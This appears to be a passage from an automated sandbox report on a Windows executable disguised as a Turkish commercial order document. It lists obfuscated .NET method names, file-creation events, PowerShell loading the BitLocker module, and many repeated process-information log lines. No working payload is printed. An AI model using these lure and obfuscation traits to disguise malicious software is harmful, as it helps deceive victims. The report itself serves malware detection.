Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, U4gvU7PbL6NdfpqcPUs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'COnVFHWEWW', 'ebMVOl6RIt', 'thuVkDow78', 'okYVHSxNdk', 'IFoVtxuvyo', 'GbyVmfLYC7', 'J9TV51wt19'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, gOiaWKgfVnkFQdi03Z.cs	High entropy of concatenated method names: 'LLI17NsGrJ', 'EOx1QRVbtS', 'oRf1eNX48e', 'mqMevKrg0f', 'CYQezqlUB8', 'Vi216vtUwK', 'aZo1a92sH9', 'IV01lKCpra', 'AUX1Rxlm3C', 'Fad1A9RTMG'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, U2KqfffNymPq7qjA8I.cs	High entropy of concatenated method names: 'OMdiopsHbe', 'mf4iI7j8nE', 'wKTiS2cGSA', 'sAiigF2h8O', 'N0yiF316ci', 'mHbibi8EYt', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, ah0kbSHK40J96Vo2hb.cs	High entropy of concatenated method names: 'Ay4NE3ZGwk', 'n6WNvJoorJ', 'eMAi6I0fo2', 'bchiacAcFk', 'xRENBUgTDG', 'gQaNxPfn0J', 'OYhNy5hqV4', 'zL1NFhyNcv', 'akBNOKgmsr', 'fWaNktn9Xy'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, oOSLaJiXYcsR9gu6Ws.cs	High entropy of concatenated method names: 'OtD9FeDAnQ', 'NBu9OGVfEv', 'KMX9kiyjyq', 'qjU9H28NDL', 'w509tpQnfV', 'uMK9mPQm2K', 'J1I95ulZug', 'LRI9Ee6efP', 'Tx99UGpwtC', 'aVV9vZ5tpK'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, tSvgqiL3ya0FMASywp.cs	High entropy of concatenated method names: 'rjHi7lxJy2', 'b44i9WBBPX', 'pmRiQsP3aq', 'GCriK8uOx5', 'ENAieQWit3', 'EcKi1lkMJX', 'LIbiJm5SXJ', 'nPkidSkefY', 'eHdiftSvuv', 'JREiYXJiKR'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, tFmfrmcTFeFYBPVGf8.cs	High entropy of concatenated method names: 'Hek1CWLAjI', 'K6s1sijkvN', 'FQ514IBnWV', 'gL612LLi83', 'tFP1nS8vul', 'rlY1WEcejE', 'dHR1TAuftf', 'br71cL1uMQ', 'JZn1pqp6af', 'r8K1GmJJIc'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, o8ZEMM6Y3kX8Ei4xMt.cs	High entropy of concatenated method names: 'ogQQ2X7iRo', 'HpiQWrWyIs', 'i3YQcwRamu', 'tFgQprlOqD', 'pxgQ0XSBtQ', 'yQOQrJgoSp', 'DQ1QNvs5xJ', 'sGmQiOvgZe', 'fDfQqF7DiW', 'FH1QV8GB2H'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, YWPamvUhpR0aeKMiX8.cs	High entropy of concatenated method names: 'Dispose', 'lD1aUgyaAN', 'xhDlIEkUMZ', 'SMPZZ8FNiw', 'kwGavxGUsa', 'dHvaz8jDPv', 'ProcessDialogKey', 'tJKl6SILh7', 'ab7laYPqBH', 'CavllUELSm'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, fwLolazv9fyHtQ4vva.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'A30qMSS7yU', 'gsFq0Sf3ll', 'lHiqrNxOZD', 'AR0qNd98OU', 'tJTqihAGhK', 'PT2qqXqjru', 'BaZqVDA40q'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, BZGao2DXdnGg50S4nE.cs	High entropy of concatenated method names: 'fBARLbGSwB', 'VwDR7dNNAx', 'h99R9CnQSj', 'mTARQFeeXT', 'ep6RKJXT5o', 'k8qRehSe0f', 'UFlR1rhjO3', 'h1xRJOUuJW', 'S29Rdcda1T', 'iKqRfuTYpb'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, t4vIAioxiY9L8sTcju.cs	High entropy of concatenated method names: 'B0nqacFiWa', 'mkkqRvjDMu', 'XkWqAM24Qm', 'sS7q7fSwaB', 'n51q9HZGMh', 'kubqKCxNUY', 'UPFqeEISsD', 'YdIi5xFSSw', 'rtviESMZvs', 'gjoiUbI4mn'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, NJgpEdEdtoODidsa3q.cs	High entropy of concatenated method names: 'ndB4tldmo', 'Ova2yhhTu', 'uspWuOPZj', 'ERtT0fBKt', 'sHTpH7sS2', 'Q8GG0RrBV', 'TsIZhT3kaXVTGpvFAk', 'vPngjr1ZnN77OvqJ5p', 'r4yiXQqGS', 'ibMV45qCw'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, QD8cW6QYGWAEa23pEf.cs	High entropy of concatenated method names: 'GjJeLmDFWJ', 'HCme95Mew2', 'FcTeKbWZ4o', 'Vyce1109Hn', 'NxMeJU9Bqn', 'zsEKtZeVKA', 'jMCKmmqSdK', 'p55K5yeiCD', 'AYQKEcavkn', 'SfWKUDUIWS'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, EVrMGL9wn5b3ZhtoWA.cs	High entropy of concatenated method names: 't6b0uDvSMK', 'faJ0xO1vWo', 'SaW0FM4xxn', 'LxA0OEmu8N', 'Sqg0IsSLD5', 'O290Se1Krr', 'jiw0gBeVbX', 'fUs0bRUdXm', 'yT40PkOrpq', 'FtR0hQ1l82'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, eSIbCv4g67m5RqgTQm.cs	High entropy of concatenated method names: 'B52a1dqsZs', 'UahaJBSbFv', 'qkGafoPrxc', 'mTLaYwH4vO', 'M9ta01vueb', 'Q4Yar64avu', 'sO1CSmv3jjqo3yAkrx', 'oiv177SQ2bJIGd5POj', 'yCTaa6XLCH', 'jvfaRMPHYx'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, DKlthmPWWLNRkw3Ofkh.cs	High entropy of concatenated method names: 'mvvqChYYy9', 'BDYqsBUTbU', 'vxmq4IXFKk', 'WvJq2oGHex', 'usTqn1jriY', 'sEpqWuceMp', 'BjIqTxW7Pp', 'xsvqcGjpLT', 'RkPqpJe5Q0', 'N47qGafu4o'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, C3IHPZhoafdfCmVdPx.cs	High entropy of concatenated method names: 'P9IKn1Gb4N', 'lq6KT07Ohe', 'nCkQSAHSds', 'J9KQgs5ijI', 'CTZQbj7jp7', 'CEZQPNlmIu', 'eDkQh6TlVT', 'T9xQjCc8kI', 'qtTQDWrKgA', 'HcgQu55M0K'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, MEggSNrSchJlDZ44U1.cs	High entropy of concatenated method names: 'kIjMcyx42Q', 'SCyMpZKpVf', 'rOUMoGT4QS', 'aD0MIyyX1u', 'k2CMghclIr', 'EZaMbGGsf7', 'O3GMhEGtVx', 'EUbMj299UV', 'GBlMuIQPfQ', 'JvmMBg0HCO'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, U4gvU7PbL6NdfpqcPUs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'COnVFHWEWW', 'ebMVOl6RIt', 'thuVkDow78', 'okYVHSxNdk', 'IFoVtxuvyo', 'GbyVmfLYC7', 'J9TV51wt19'

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	File created: \ticari siparis belgesi 26 07 2024 17545000600.exe
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	File created: \ticari siparis belgesi 26 07 2024 17545000600.exe
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	File created: \ticari siparis belgesi 26 07 2024 17545000600.exe
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	File created: \ticari siparis belgesi 26 07 2024 17545000600.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	File created: \ticari siparis belgesi 26 07 2024 17545000600.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	File created: \ticari siparis belgesi 26 07 2024 17545000600.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
